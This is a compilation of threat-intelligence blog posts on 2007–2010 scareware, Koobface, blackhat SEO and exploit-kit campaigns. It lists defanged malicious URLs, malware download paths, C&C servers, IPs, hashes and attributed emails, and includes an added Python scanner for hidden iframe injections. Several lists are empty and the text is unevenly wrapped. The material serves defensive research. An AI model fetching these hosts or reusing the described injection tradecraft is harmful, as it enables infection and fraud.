Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild - Part Two (2018-10-21 22:47)

It's 2008 and I've recently come across a massive black hat SEO campaign successfully enticing users into falling victim to a fraudulent and malicious scareware-serving campaign. In this post I'll provide actionable intelligence on the infrastructure behind it.





Related malicious domains and redirectors known to 
have participated in the campaign: 


We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 

Historical OSINT - Rogue Scareware Dropping Campaign Spotted in the Wild Courtesy of the Koobface Gang (2018-10-21 23:02)

It's 2010 and I've recently come across a diverse portfolio of fake security software, also known as scareware, courtesy of the Koobface gang, in what appears to be a [1]direct connection between the gang's activities and the Russian Business Network.

In this post I'll provide actionable intelligence on the infrastructure behind it and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it, including the establishment of a direct connection between the gang's activities and a well-known Russian Business Network customer.

Related malicious domains known to have 
participated in the campaign: 

hxxp://piremover.eu/hitin.php?affid=02979 - 
212.117.161.142; 95.211.27.154; 95.211.27.166 

Once executed, a sample malware (MD5: eedac4719229a499b3118f87f32fae35) phones back to the following malicious C&C server IPs:

hxxp://xmiueftbmemblatlwsrj.cn/get.php?id=02979 - 91.207.116.44 - Email: robertsimonkroon@gmail.com

Domains known to have responded to the same malicious C&C server IPs:


Once executed a sample malware phones back to the following malicious C&C service IPs:

hxxp://xmiueftbmemblatlwsrj.cn

hxxp://urodinam.net - which is a [2]well known [3]Koobface 1.0 C&C server domain IP also seen in the "[4]Mass DreamHost Sites Compromise" exclusively profiled in this post.

hxxp://xmiueftbmemblatlwsrj.cn

Once executed a sample malware (MD5: 66dc85ad06e4595588395b2300762660; MD5: 91944c3ae4a64c478bfba94e9e05b4c5) phones back to the following malicious C&C server IPs:

hxxp://proxim.ntkrnlpa.info - 83.68.16.30 - seen and observed in related analysis regarding the [5]mass Embassy Web site compromise throughout 2007 and 2009.

Successfully dropping the following malicious Koobface MD5:

hxxp://harmonyhudospa.se/.sys/?getexe=fb.70.exe

Related malicious MD5s known to have participated in the campaign:

MD5: 66dc85ad06e4595588395b2300762660
MD5: 8282ea8e92f40ee13ab716daf2430145

Once executed a sample malware phones back to the following malicious C&C server IPs:

hxxp://tehnocentr.chita.ru/.sys 

hxxp://gvpschekschov.iv-edu.ru/.sys/?action=fbgen 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 



1. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html
2. https://draft.blogger.com/
3. https://ddanchev.blogspot.com/2010/05/koobface-gang-responds-to-10-things-you.html
4. https://ddanchev.blogspot.com/2010/05/dissecting-mass-dreamhost-sites.html
5. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

Historical OSINT - Profiling a Portfolio of Active 419-Themed Scams (2018-10-21 23:08)

It's 2010 and I've recently decided to provide actionable intelligence on a variety of 419-themed scams, in particular the actual malicious actors behind the campaigns, with the idea to empower law enforcement and the community with the necessary data to track down and prosecute the malicious actors behind these campaigns.

Related malicious and fraudulent emails known to 
have participated in the campaign: 


Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in the Wild (2018-10-21 23:21)

It's 2010 and I've recently stumbled upon yet another diverse portfolio of blackhat SEO domains, this time serving rogue security software, also known as scareware, to unsuspecting users, with the cybercriminals behind the campaign successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts, largely relying on the utilization of an affiliate-network based type of revenue sharing scheme.

In this post I'll profile the infrastructure behind the campaign and provide actionable intelligence on it.

Related malicious domains known to have 
participated in the campaign: 


Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:37)

It's 2010 and I've recently intercepted a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into interacting with rogue and fraudulent scareware-serving malicious and fraudulent campaigns.

In this post I'll profile the infrastructure behind the campaign and provide actionable intelligence on it.

Sample URL redirection chain:

hxxp://noticexsummary.com/re.php?lnk=1203597664 - 87.255.55.231
- hxxp://new-pdf-reader.com/l/promo/index.asp?aff=11677 - 66.207.172.196
- hxxps://secure-signupway.com/promo/join.aspx?siteid=3388

Related malicious domains known to have participated in the campaign:

hxxp://noticexsummary.com/

Related malicious domains known to have participated in the campaign:

hxxp://online-tv-on-your-pc.com/p2/index.asp?aff=11680&camp=unsub

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 

Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:47)

It's 2010 and I've recently come across a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into interacting with rogue and fraudulent scareware-serving malicious and fraudulent campaigns.

In this post I'll provide actionable intelligence on the infrastructure behind the campaign.

Related malicious domains known to have 
participated in the campaign: 


Related malicious domains known to have 
participated in the campaign: 


Related malicious domains known to have 
participated in the campaign: 

hxxp://drivemedirect.com
hxxp://virtualblog5.com
hxxp://fastwebway.com

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 

Historical OSINT - Spamvertized Swine Flu Domains - Part Two (2018-10-21 23:50)

It's 2010 and I've recently come across a currently active diverse portfolio of Swine Flu related domains further enticing users into interacting with rogue and malicious content.

In this post I'll profile and expose a currently active malicious domains portfolio currently circulating in the wild, successfully involved in an ongoing variety of Swine Flu malicious spam campaigns, and will provide actionable intelligence on the infrastructure behind it.



Related malicious domains known to have participated in the campaign:

hxxp://pehwitew.cn - 58.17.3.44; 58.20.140.5; 220.248.167.126; 60.191.221.116; 110.52.6.252

Related name servers known to have participated in the campaign:


Related malicious domains known to have 
participated in the campaign: 


Known to have responded to the same malicious IP (60.191.221.123) are also the following malicious domains:


Related malicious name servers known to have 
participated in the campaign: 



Related malicious domains known to have participated in the campaign:

hxxp://xiskizop.cn - 58.17.3.44; 60.191.239.189; 203.93.208.86

hxxp://ns5.prizeaware.com; hxxp://ns1.grandzap.com; hxxp://ns3.alertjust.com

Related malicious domains known to have 
participated in the campaigns: 


Related malicious name servers known to have 
participated in the campaign: 




Related malicious domains known to have 
participated in the campaigns: 


Related malicious domains known to have 
participated in the campaign: 


Related malicious domains known to have 
participated in the campaign: 


We'll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:55)

It's 2008 and I've recently stumbled upon a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into falling victim to fake security software, also known as scareware, including a variety of dropped fake codecs, largely relying on the acquisition of legitimate traffic through active blackhat SEO campaigns, in this particular case various North Korea news including Mike Tyson's daughter themed campaigns.

Related malicious domains and redirectors known to 
have participated in the campaign: 

hxxp://fi97.net 

hxxp://is-the-boss.com - Email: dantsr@gmail.com 

Related malicious domains known to have 
participated in the campaign: 



hxxp://north-korea-news.moviegator.us 

Related malicious domains known to have 
participated in the campaign: 

hxxp://petrenko.biz 

Related malicious domains known to have 
participated in the campaign: 


Related rogue YouTube accounts known to have 
participated in the campaign: 

hxxp://www.youtube.com/user/afohebac5ar

hxxp://www.youtube.com/user/irufupolOop 

Related malicious domains known to have 
participated in the campaign: 


Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://mgjmnfgbdfb.com/fff9999.php

hxxp://mgjmnfgbdfb.com/eee9999.php

Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://imageempires.com/perce/9dc0266f8077f4b2cd9411ed48ecdda988af00003bl280c47e899830c09969686e8ccfe804c2a7ce5/c0a/perce.jpg

hxxp://imagescolor.com/item/adb0765f302764425d74cl2df84cbd29185f9070bb2230a42e0958e050299908delc5f0844c2579e3/20c/item.gif

hxxp://picturehappiness.com/werber/207/216.jpg

hxxp://archiveexefiles09.com/file.exe

Related malicious URLs known to have participated 
in the campaign: 

hxxp://archiveexefiles09.com/softwarefortubeview.45016.exe

Related malicious URLs known to have participated 
in the campaign: 


We'll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - A Diversified Portfolio of Fake Security Software (2018-10-22 13:33)

It's 2010 and I've recently stumbled upon a currently active and circulating malicious and fraudulent portfolio of fake security software, also known as scareware, potentially enticing hundreds of thousands of users to a multitude of malicious software, with the cybercriminals behind the campaign potentially earning fraudulent revenue in the process of monetizing access to malware-infected hosts, largely relying on the utilization of an affiliate network-based type of revenue sharing scheme.

Related malicious domains known to have 
participated in the campaign: 


We'll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - A Diversified Portfolio of Fake Security Software Spotted in the Wild (2018-10-22 13:40)

It's 2010 and I've recently stumbled upon yet another malicious and fraudulent domain portfolio serving a variety of fake security software, also known as scareware, potentially exposing hundreds of thousands of users to a variety of fake security software, with the cybercriminals behind the campaign potentially earning fraudulent revenue, largely relying on the utilization of an affiliate-network based type of revenue-sharing scheme.

Related malicious domains known to have 
participated in the campaign: 

We'll continue monitoring the campaign and post updates
as soon as new developments take place.

Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Serves Scareware (2018-10-22 14:05)

It's 2010 and I've recently stumbled upon a currently active and circulating malicious and fraudulent blackhat SEO campaign successfully enticing hundreds of thousands globally into interacting with a multitude of rogue and malicious software, also known as scareware.

In this post I'll profile the campaign, discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it, and provide actionable intelligence on the infrastructure behind it.

Related malicious domains known to have 
participated in the campaign: 

hxxp://ozeqiod.cn?uid=213 - redirector - 64.86.25.201 - hxxp://bexwuq.cn

Sample URL redirection chain:

hxxp://ymarketcoms.cn/?pid=123

Related malicious domains known to have responded to the same malicious C&C server IPs (64.86.25.201):


Related malicious domains known to have 
participated in the campaign: 


We'll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Malicious Economies of Scale - The Emergence of Efficient Platforms for Exploitation - 2007 (2018-10-22 16:23)

Dear blog readers, it's been several years since I last posted a quality update following my [1]2010 disappearance. As it's been quite a significant period of time since I last posted a quality update, I feel it's about time I post a quality update by detailing the Web Malware Exploitation market segment circa 2007, prior to my visit to the GCHQ as an independent contractor with the [2]Honeynet Project.

In this post I'll discuss the rise of Web malware exploitation kits circa 2007 and offer in-depth discussion on the current and emerging tactics, techniques and procedures (TTPs) of the cybercriminals behind it. With cybercriminals continuing to actively rely on the exploitation of patched and outdated vulnerabilities, and with end users continuing to actively utilize unpatched and outdated third-party software, it shouldn't be surprising that today's botnets remain relatively easy to generate and orchestrate for the purpose of committing financial fraud.

Malicious Economies of Scale literally means utilizing attack techniques and exploitation approaches to efficiently, yet cost and time effectively, infect or abuse as many victims as possible, in combination with an added layer of improved metrics on the success of the campaigns. What are the most popular web exploitation kits that malicious parties use to achieve this? Which are the most popular vulnerabilities used in the majority of the kits? What are the most popular techniques for embedding malware? This white paper will outline this efficiency-centered attack model, and will cover web application vulnerabilities, client-side vulnerabilities, malvertising and black hat SEO (search engine optimization).

An overview of the threats posed by the rising number of malware embedded sites, with a discussion of the exploitation techniques and kits used, as well as detailed summaries of all such high-profile attacks during 2007.

01. Reaching the Efficiency Scale Through a Diverse Set of Exploited Vulnerabilities

2007 was the year in which client-side vulnerabilities significantly replaced server-side ones as the preferred choice of malicious attackers on their way to achieving the highest possible attack success rate, while keeping their investment in terms of know-how and personal effort to a minimum. Among the most successful such attacks during 2007 was Storm Worm, the perfect example that the use of outdated and already patched vulnerabilities can result in aggregating the world's largest botnet, according to industry and independent researchers' estimates. By itself, this attack technique is in direct contradiction with the common wisdom that zero day vulnerabilities are more dangerous than already patched ones. The gang behind Storm Worm, however, quickly saw this biased statement as false, and by standardizing the exploitation process with the help of outdated vulnerabilities achieved enormous success.

Years ago, whenever a vulnerability was found and exploit code released in the wild, malicious attackers used to quickly release a do-it-yourself exploitation kit to take advantage of a single exploit only. Nowadays, that's no longer the case, since by using a single exploit, whether an outdated or a zero day one, they're significantly limiting the probability of a successful attack. The more diverse the set of exploits used in an attack, and the more of them are served on-the-fly, the higher the success rate.

What was even more interesting to monitor during 2007 was the rise of high-profile sites serving malware, and the decline of malware coming from bogus ones. From the [3]Massive Embedded Malware Attack at a large Italian ISP to the Bank of India, the Syrian Embassy in the U.K, the U.S Consulate in St. Petersburg, China's CSIRT, Possibility Media's entire portfolio of E-zines, and the French government's site related to Libya, these trusted web sites were all found to serve malware through an embedded link pointing back to the attacker's malicious server. Let's clarify what malicious economies of scale means, and how it is achieved.

02. What is malicious economies of scale, and how is it achieved?

Malicious economies of scale is a term I coined in 2007 to summarize the ongoing trend of efficiently attacking online users by standardizing the exploitation process, and by doing so, not just lowering the entry barriers into the process of exploiting a large number of users, but also maintaining a rather static success rate of infections. Malicious economies of scale is the efficient way by which a large number of end users get infected, or have their online abused, with the malicious parties maintaining a static attack model.

It's perhaps more important to also describe how the process is achieved in the first place. The first strategy applied has to do with common sense in respect to the most popular software applications present at the end user's end, and the first touch-point in this case would be the end user's Internet browser. Detecting its version and serving an exploit that directly matches the vulnerable version is among the web exploitation kits' main functionalities.

Let's continue with the second strategy, namely to increase the probability of success. As I've already pointed out, do-it-yourself single vulnerability exploiting tools matured into web exploitation malware kits, now backed up with a diverse set of exploits targeting different client-side applications, which increases the probability of successful infection.

The third strategy has to do with attracting traffic to the malicious server, which, as I've already discussed, is automatically set to anticipate the upcoming flood of users and serve the malware by exploiting client-side software vulnerabilities on their end. This is mainly done by exploiting remote file inclusion vulnerabilities within the high-profile targets, or through remotely exploitable web application vulnerabilities, to embed a single line of code, or an obfuscated javascript that when deobfuscated will load the malicious URL in between loading the legitimate site.
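The defender's view of this third strategy, as an added example that is not part of the original white paper: a static scan of a page for embeds that point outside the site's own hosts, including ones that only appear after decoding `unescape(...)` or `String.fromCharCode(...)` literals in inline script. The allowlisted hostnames, the `.invalid` hosts and the sample page are constructed for the illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Hosts this site legitimately embeds content from (assumption for the example).
FIRST_PARTY = {"www.example.org", "static.example.org"}

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
TINY = re.compile(r"[01](px)?", re.I)
# Literal arguments of two string decoders commonly seen in injected scripts.
UNESCAPE_LITERAL = re.compile(r"unescape\(\s*(['\"])([^'\"]+)\1\s*\)")
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
MAX_DEPTH = 3  # stop following nested decode layers after this many levels


def _host(url):
    """Lower-cased host of an absolute or protocol-relative URL, '' if relative."""
    return (urlparse(url).hostname or "").lower()


def _decoded_literals(code):
    """Statically decode unescape("...") and String.fromCharCode(...) literals."""
    for m in UNESCAPE_LITERAL.finditer(code):
        yield unquote(m.group(2))
    for m in FROMCHARCODE.finditer(code):
        nums = [int(n) for n in m.group(1).split(",") if n.strip()]
        yield "".join(chr(n) for n in nums if n < 0x110000)


class EmbedScanner(HTMLParser):
    """Collects (kind, host, depth) for embeds that point outside the allowlist."""

    def __init__(self, allowed, depth=0):
        super().__init__(convert_charrefs=True)
        self.allowed, self.depth = allowed, depth
        self.findings = []
        self._script = None  # list of text chunks while inside <script>

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        host = _host(a.get("src", ""))
        external = bool(host) and host not in self.allowed
        if tag == "iframe" and external:
            hidden = (TINY.fullmatch(a.get("width", "").strip())
                      or TINY.fullmatch(a.get("height", "").strip())
                      or HIDDEN_STYLE.search(a.get("style", "")))
            kind = "hidden-iframe" if hidden else "external-iframe"
            self.findings.append((kind, host, self.depth))
        elif tag == "script":
            if external:
                self.findings.append(("external-script", host, self.depth))
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            code, self._script = "".join(self._script), None
            for markup in _decoded_literals(code):
                # Re-scan markup that only exists after deobfuscation.
                if self.depth < MAX_DEPTH and "<" in markup:
                    self.findings.extend(
                        scan_page(markup, self.allowed, self.depth + 1))


def scan_page(html, allowed=FIRST_PARTY, depth=0):
    """Return findings for one HTML document, including decoded script layers."""
    scanner = EmbedScanner(set(allowed), depth)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate page carrying two injected embeds, one in
# plain markup and one hidden behind document.write(unescape(...)).
SAMPLE_PAGE = """<html><body>
<h1>Local news</h1>
<script src="http://static.example.org/site.js"></script>
<iframe src="http://www.example.org/weather" width="300" height="200"></iframe>
<iframe src="http://exploit-host.invalid/in.php" width="0" height="0"></iframe>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//second-host.invalid/x%22%20style%3D%22display%3Anone%22%3E%3C/iframe%3E"));</script>
</body></html>"""

if __name__ == "__main__":
    for kind, host, depth in scan_page(SAMPLE_PAGE):
        print(f"{kind:16} {host:24} decode-depth={depth}")
```

A finding with a decode depth above zero means the embed is absent from the served markup and only materialises in the browser, which is why a plain grep for `<iframe` over the page source misses it.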

Popular Malware Embedded Attack Tactics 

This part of the article will briefly describe some of the most 
common attack tactics malicious parties use to 

embed links to their malicious servers on either high-profile 
sites, or any other site with a high pagerank, something 

they've started measuring as of recently according to threat 
intell assessment on an automated system to embed 

links based on a site's popularity. 

• The "pull" Approach - Blackhat SEO, Harnessing the Trusted Audience of a Hacked Site

In this tactic, malicious parties rely entirely on the end users to reach their malicious server, compared to the second tactic of "pushing" the malicious links to them. This is primarily accomplished through the use of Blackhat SEO tools generating junk content with the idea to successfully attract search engine traffic for popular queries, thus infecting anyone who visits the sites, which often appear within the first twenty search results. The second "pull" tactic is harnessing the already established trust of a site, such as a major news portal for instance, and by embedding a link to automatically load on the portal, having the users actually "pull" the malware for themselves.

• The "push" Approach - Here's Your Malware Embedded Link

The "push" approach's success lies in its simple logic. With end users still worrying about downloading or clicking on email attachments, and given the overall lack of understanding of how to protect against sites serving malware, it's logical to consider that simply sending a link which, once visited, will automatically infect the visitor through exploiting a client-side vulnerability actually works. Storm Worm is the perfect example, and to demonstrate once again what malicious economies of scale mean, it's worth mentioning Storm's approach of having an already infected host act as an infection vector itself, compared to its authors having to register multiple domains and change them periodically. The result is malware embedded links exploiting client-side vulnerabilities in the form of an IP address, in this case an already infected host that's now aiming to infect another one.

• Automatically Exploiting Web Application Vulnerabilities - Mass SQL Injection Attacks

As I've already pointed out, malicious parties are not just 
efficiently scanning for remotely exploitable web application 

vulnerabilities or looking for ways to remotely include files 
on any random host, they've started putting efforts into 

analyzing the page rank, and overall popularity of a site 
they could exploit. This prioritizing of the sites to be used for 

a "pull" tactic is aiming to achieve the highest possible 
success rate by targeting a high-trafficked site, where even 

though the attack can be detected, the "window of 
opportunity" while the users were also accessing the 
malicious 

server could be far more beneficial than having a permanent 
malware link on a less popular site for an indefinite 

period of time. 

• Malicious Advertisements - Malvertising 

Among the most popular traffic acquisition tactics nowadays remains the active utilization of legitimate Web properties for the purpose of socially engineering an ad network provider into featuring a specific malware-serving advertisement at the targeted Web site, including active Web site compromise for the purpose of injecting rogue and malicious ads on the targeted host.

Related posts: 

• [4]Historical OSINT - Malicious Malvertising Campaign, 
Spotted at FoxNews, Serves Scareware 

• [5]Cybercriminals Launch Malicious Malvertising 
Campaign, Thousands of Users Affected 

• [6]Managed SWF Injection Cybercrime-friendly Service 
Fuels Growth Within the Malvertising Market Segment 

• Buying Access to Hacked Cpanels or Web Servers 

Thanks to a vibrant DIY (do-it-yourself) Web malware exploitation kit culture, including the active utilization of various DIY Web site exploitation and malware-generating tools, cybercriminals continue actively utilizing stolen and compromised accounting data for the purpose of injecting malicious scripts on the targeted host, further compromising the confidentiality, availability and integrity of the targeted host.

• Harvesting accounting data from malware infected 
hosts 



Having administrator access to a domains portfolio, or any type of access through a web application backdoor or direct FTP/SSH, reached its commercial level a long time ago. In fact, differentiated pricing applies in this case, on the basis of a site's page rank. I've stumbled upon great examples of "underground goods liquidity" as a process, where access to a huge domains portfolio through hacked Cpanels is being offered for cents, with the seller's main concern being that cents are better than nothing, nothing in the sense that she may lose access to the Cpanel before it's sold and thus end up with nothing. Now, let's discuss the most popular malware exploitation kits currently in the wild.

The Most Popular Web Malware Exploitation Kits 

Going into detail about the most common vulnerabilities used in the multitude of web malware exploitation kits could be irrelevant from the perspective of their current state of "modularity", that is, although the default installation of a kit contains a rather modest set of exploits, the possibility to add new exploits has long reached the point'n'click stage. Even worse, localizing the kits to different languages further contributes to their ease of use and acceptance on a large scale, just as does their open source nature, which makes it easy for coders to use a successful kit's modules as a foundation for a new one. That is something that's happening already, namely the difference between a copycat kit and an original one coded from scratch. Among the most popular malware kits remain:


• A Brief Overview of MPack, IcePack, Zunker, 
Advanced Pack and Fire Pack 

During 2007, Mpack emerged as the most popular malware exploitation kit. Originally available for purchase, by the time copies of the kit started leaking out, anyone from a script kiddie to a pragmatic attacker had obtained a copy of it. Mpack's main strength is its well configured default installation, which, in combination with a rather modest, but then again modular, set of exploits, as well as its point'n'click level of sophistication, automatically turned it into the default malware kit. Mpack has been widely used in nearly all of the high-profile malware embedded attacks during 2007; however, its popularity resulted in way too much industry attention towards its workings, and therefore malicious parties started coming up with new kits, still using Mpack as the foundation, at least from a theoretical perspective.

The list is endless: the Nuclear Malware kit, Metaphisher, old version of the WebAttacker and the Rootlauncher kit, with the latest and most advanced innovation named the Random JS Exploitation Kit. Compared to the previous one, this one is going a step beyond the usual centralized malicious server.

With malicious parties now interested in controlling as many infected hosts with as little effort as possible, client-side vulnerabilities will continue to be largely abused in an efficient way through web malware exploitation kits in 2008. The events that took place during 2007 clearly demonstrate the pragmatic attack approaches malicious parties started applying, namely realizing that an outdated but unpatched on a large scale vulnerability is just as valuable as a zero day one.

1. https://ddanchev.blogspot.com/2018/10/dancho-danchevs-2010-disappearance.html

2. https://speakerdeck.com/ddanchev/cesg-hp-cyberintel-dancho

3. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

4. https://ddanchev.blogspot.com/2017/01/historical-osint-malicious-malvertising.html

5. https://ddanchev.blogspot.com/2016/04/cybercriminals-launch-malicious.html

6. https://ddanchev.blogspot.com/2016/08/managed-swf-injection-cybercrime.html



























Pay-Per-Exploit Acquisition Vulnerability Programs - 
Pros and cons? (2018-10-22 17:47) 

As [1]ZERODIUM starts paying premium rewards to security researchers to acquire their previously unreported zero-day exploits affecting multiple operating systems, software and/or devices, a logical question emerges in the context of the program's usefulness and potential benefits, including potential vulnerabilities within the actual acquisition process: how would the program undermine the security industry, and what would be the eventual outcome for the security researcher in terms of [2]fueling growth in the cyber warfare market segment?

In this post I'll discuss the market segment for pay-per-exploit acquisition programs and discuss in-depth the current exploit-acquisition methodology utilized by different vendors and provide in-depth discussion on various over-the-counter acquisition methodologies applied by malicious attackers on their way to monetize access to malware-infected hosts while compromising the confidentiality, availability and integrity of the targeted host, including an active discussion on the ongoing and potential weaponization of zero day vulnerabilities in the context of today's cyber warfare world.

Having greatly realized the potential of acquiring zero day vulnerabilities for the purpose of actively exploiting end users, malicious actors have long been aware of the [3]over-the-counter acquisition market model, further enhancing their capabilities when launching malicious campaigns. Among the most widely [4]spread myths about zero day vulnerabilities is that [5]zero day vulnerabilities are the primary growth factor of the cybercrime ecosystem, further resulting in a multitude of malicious activity targeting end users.

With vendors continuing to establish the foundations for active vulnerability and exploit acquisition programs, third-party vendors and research organizations continue successfully disintermediating the vendor's major vulnerability and exploit acquisition programs, successfully resulting in the launch and establishment of third-party services and products, further populating the security-industry with related products and services, potentially acquiring "know-how" and relevant vulnerability and exploit information from major vendors, further launching related companies and services, potentially empowering third-party researchers, vendors and individuals, including nation-state actors, with potential weaponization capabilities, potentially leading to successful target-acquisition practices on behalf of third-party researchers and individuals.

Becoming a target in the widespread context of third-party vendors and researchers might not be the wisest approach when undermining potential research and in-house research and benchmarking activities in terms of evaluating and responding to vulnerabilities and exploits. Vendors looking for ways to efficiently improve the overall security and product performance in terms of security should consider basic internal benchmarking practices and should also consider a possible incentive-based type of vulnerability and exploit reward-type of revenue-sharing program, potentially rewarding company employees and researchers with the necessary tools and incentives to find, discover and report security vulnerabilities and exploits.

Something else worth pointing out in terms of vulnerability research and exploit discovery is the life-cycle of a zero day vulnerability and exploit, which can be best described as a long-run process. Malicious and fraudulent actors utilizing client-side exploits for the purpose of dropping malicious software on the hosts of the targeted victims often rely on outdated and patched vulnerabilities, and on the overall misunderstanding that zero day vulnerabilities and exploits are the primary growth factor of the security-industry. They will also often rely on the fact that end users and enterprises are often unaware of the basic fact that cybercriminals often rely on outdated and patched vulnerabilities, successfully targeting thousands of users globally on a daily basis.

What used to be a market-segment dominated by DIY (do-it-yourself) exploit and malware-generating tools is today a market-segment dominated by Web malware-exploitation kits successfully affecting thousands of users globally on a daily basis. In terms of Web-malware exploitation kits, among the most common misconceptions regarding the utilization of such kits is that the cybercriminals behind them rely on newly discovered exploits and vulnerabilities, when in fact they rely on [6]outdated and already patched security vulnerabilities and exploits for the purpose of successfully enticing thousands of users globally into falling victim to social-engineering driven malicious and fraudulent campaigns.

Despite the evident usefulness from a malicious actor's point of view when launching malicious campaigns, malicious actors continue utilizing outdated vulnerabilities for the purpose of launching malicious campaigns, further utilizing a multitude of social engineering attack vectors to enhance the usefulness of the exploitation vector. Another crucial aspect of the pay-per-exploit acquisition vulnerability model is the reliance on outdated and unpatched vulnerabilities for the purpose of launching malicious campaigns, further relying on the basic fact that on the majority of occasions end users fail to update their third-party applications, often exposing themselves to a variety of successful malicious campaigns utilizing outdated and unpatched vulnerabilities.

We expect to continue observing an increase in the pay-per-exploit acquisition model, with related acquisition model participants continuing to acquire vulnerabilities, further fueling growth in the market segment. We expect that malicious actors will adequately respond through over-the-counter acquisition models, including the utilization of outdated and unpatched vulnerabilities. End users are advised to continue ensuring that their third-party applications are updated, to build a general security awareness, and to ensure that they're running a fully patched antivirus solution.

Consider going through the following related posts: 

[7] Researchers spot new Web malware exploitation kit

[8] Web malware exploitation kits updated with new Java exploit

[9] Which are the most commonly observed Web exploits in the wild?

[10] Report: Patched vulnerabilities remain prime exploitation vector

[11] Report: malicious PDF files becoming the attack vector of choice

[12] Malvertising campaigns at multiple ad networks lead to Black Hole Exploit Kit

[13] 56 percent of enterprise users using vulnerable Adobe Reader plugins

[14] Report: third party programs rather than Microsoft programs responsible for most vulnerabilities

[15] Report: malicious PDF files becoming the attack vector of choice

[16] Malvertising campaigns at multiple ad networks lead to Black Hole Exploit Kit

[17] 56 percent of enterprise users using vulnerable Adobe Reader plugins

[18] Report: third party programs rather than Microsoft programs responsible for most vulnerabilities

[19] Report: 64% of all Microsoft vulnerabilities for 2009 mitigated by Least Privilege accounts

[20] Secunia: popular security suites failing to block exploits

[21] 37 percent of users browsing the Web with insecure Java versions

[22] Which are the most commonly observed Web exploits in the wild?

[23] Report: Malicious PDF files comprised 80 percent of all exploits for 2009

[24] Secunia: Average insecure program per PC rate remains high

2. https://www.webroot.com/blog/2013/12/27/cybercrime-trends-2013-year-review/

3. http://www.zdnet.com/article/black-market-for-zero-day-vulnerabilities-still-thriving/

4. https://www.zdnet.com/article/seven-myths-about-zero-day-vulnerabilities-debunked

5. https://www.zdnet.com/article/report-patched-vulnerabilities-remain-prime-exploitation-vector/

6. https://www.zdnet.com/article/a-patched-browser-false-feeling-of-security-or-a-security-utopia-that-actu

7. https://www.zdnet.com/article/researchers-spot-new-web-

11. https://www.zdnet.com/article/report-malicious-pdf-files-

13. https://www.zdnet.com/article/56-percent-of-enterprise-users-using-vulnerable-adobe-reader-plugins/

14. https://www.zdnet.com/article/report-third-party-programs-rather-than-microsoft-programs-responsible-for-most-vulnerabilities/

18. https://www.zdnet.com/article/report-third-party-

Cyber Security Project Investment Proposal - DIA Needipedia - Fight Cybercrime and Cyber Jihad With Sensors - Grab Your Copy Today! (2018-12-16 13:52)

Dear blog readers, I decided to share with everyone a currently pending project investment proposal regarding the upcoming launch of a proprietary Technical Collection analysis platform with the project proposal draft available on request part of [1]DIA's Needipedia Project Proposal Investment draft or eventually through the [2]Smith Richardson Foundation.

In case you're interested in working with me for the purpose of implementing the project solution including a possible investment proposal on your behalf - that also includes a possible VC or an angel investor introduction - I can be reached at dancho.danchev@hush.com

Looking forward to receiving your comments, questions, feedback and general remarks including possible investment proposal requests. Happy Holidays!

Enjoy! 

01. Executive summary 

The Obmonix platform aims to build the world's most 
versatile and comprehensive sensor network for 
intercepting 



cybercrime and cyber jihad activity on a global scale 
successfully positioning the project as a leading in-house 
built 

provider for actionable intelligence within the Intelligence 
Community. 

02. What are you trying to do? 

The Obmonix platform aims to build the world's most versatile and comprehensive sensor network for intercepting cybercrime and cyber jihad activity successfully positioning the platform as a leading in-house provider of actionable intelligence within the Intelligence Community.

03. How is it currently done? 

Largely relying on a selected set of outsourced intelligence-gathering providers, the Intelligence Community's overall reliance on commercial intelligence gathering providers has successfully positioned the Intelligence Community with a limited sight in terms of pro-active and systematic response to cybercrime and cyber jihad events globally.

04. What's new? 

Largely relying on the utilization of multiple interception 
vectors including hybrid-based type of sensor networks the 


Intelligence Community is successfully positioned to 
successfully intercept and proactively respond to a growing 
set 

of cybercrime and cyber jihad events globally. 

05. Who cares? 

The Intelligence Community largely positioned to take 
advantage of a growing set of technologies for the purpose 

of pro-actively responding to a growing set of cybercrime 
and cyber jihad events globally is ultimately empowered 

to take advantage of modern hybrid-based type of sensor 
networks for the purpose of successfully intercepting and 

responding to a growing set of cybercrime and cyber jihad 
events globally. 

06. What are the risks? 

Successfully positioning the provider as a leading provider 
for actionable intelligence in terms of cybercrime and 

cyber jihad events globally within the Intelligence 
Community will successfully position the Obmonix platform 
and 

its operator as a leading provider of actionable intelligence 
within the Intelligence Community. 

Transmittal Letter 

